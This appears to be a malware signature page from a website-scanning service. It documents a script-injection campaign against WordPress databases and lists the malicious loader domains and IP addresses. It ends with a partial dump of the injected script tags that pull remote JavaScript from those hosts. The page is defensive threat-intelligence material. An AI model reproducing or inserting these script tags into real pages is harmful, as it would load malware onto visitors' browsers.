SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwrks3

malware-entry-mwrks3

Description: Code used to insert a malicious javascript into many
sites hosted at Rackspace and Mediatemple.

Loads malware from (all of them pointing to 91.188.59.203)

http://ae.awaue.com
http://ie.eracou.com
http://ao.euuaw.com
http://aeaaea.com/ou
http://secree.com/re
http://uoauer.com/si
http://oeooea.com/ve
http://secowo.com/wo
http://seconeo.com/on
http://ouroue.com/se
http://avoen.info/e

Newest versions of this attack are using 188.72.194.172:
http://w3.fairygoodideas.com/in.cgi?2

Infection: It infects all posts inside the database (wp_posts). Only wordpress sites are infected.

Clean up: Contact support@sucuri.net for help.

Malware dump:< script src = http://ao.euuaw.com/9

< script src = http://ae.awaue.com/7

< script src="http://aeaaea.com/o..